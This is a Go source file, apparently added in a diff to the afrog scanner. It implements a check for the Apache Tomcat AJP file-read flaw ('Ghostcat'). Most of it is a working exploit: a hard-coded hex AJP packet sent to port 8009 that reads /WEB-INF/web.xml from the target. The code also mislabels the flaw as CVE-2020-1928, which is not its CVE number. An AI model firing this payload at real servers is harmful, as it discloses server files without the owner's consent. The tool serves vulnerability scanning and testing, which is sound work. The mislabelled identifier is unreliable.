| 1 | + | package gopoc |
| 2 | + | |
| 3 | + | import ( |
| 4 | + | "bytes" |
| 5 | + | "errors" |
| 6 | + | |
| 7 | + | "github.com/zan8in/afrog/pkg/poc" |
| 8 | + | "github.com/zan8in/afrog/pkg/proto" |
| 9 | + | "github.com/zan8in/afrog/pkg/utils" |
| 10 | + | ) |
| 11 | + | |
| 12 | + | var ( |
| 13 | + | tomcatAjpPort = "8009" |
| 14 | + | tomcatAjpUnAuthName = "CVE-2020-1928" |
| 15 | + | ) |
| 16 | + | |
| 17 | + | func tomcatAjpUnAuth(args *GoPocArgs) (Result, error) { |
| 18 | + | poc := poc.Poc{ |
| 19 | + | Id: tomcatAjpUnAuthName, |
| 20 | + | Info: poc.Info{ |
| 21 | + | Name: "Apache Tomcat AJP 文件读取与包含漏洞", |
| 22 | + | Author: "zan8in", |
| 23 | + | Severity: "high", |
| 24 | + | Description: "Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。", |
| 25 | + | Reference: []string{ |
| 26 | + | "https://blog.csdn.net/qq_44159028/article/details/112507136", |
| 27 | + | }, |
| 28 | + | }, |
| 29 | + | } |
| 30 | + | args.SetPocInfo(poc) |
| 31 | + | result := Result{Gpa: args, IsVul: false} |
| 32 | + | |
| 33 | + | if len(args.Host) == 0 { |
| 34 | + | return result, errors.New("no host") |
| 35 | + | } |
| 36 | + | |
| 37 | + | addr := args.Host + ":" + tomcatAjpPort |
| 38 | + | payload := []byte("1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff") |
| 39 | + | |
| 40 | + | resp, err := utils.Tcp(addr, utils.HexDecode(string(payload))) |
| 41 | + | if err != nil { |
| 42 | + | return result, err |
| 43 | + | } |
| 44 | + | |
| 45 | + | if bytes.Contains(resp, []byte("Licensed to the Apache Software Foundation")) { |
| 46 | + | result.IsVul = true |
| 47 | + | url := proto.UrlType{Host: addr, Port: tomcatAjpPort} |
| 48 | + | result.SetAllPocResult(true, &url, utils.HexDecode(string(payload)), resp) |
| 49 | + | return result, nil |
| 50 | + | } |
| 51 | + | |
| 52 | + | return result, errors.New("check result: no vul") |
| 53 | + | } |
| 54 | + | |
| 55 | + | func init() { |
| 56 | + | GoPocRegister(tomcatAjpUnAuthName, tomcatAjpUnAuth) |
| 57 | + | } |
| 58 | + | |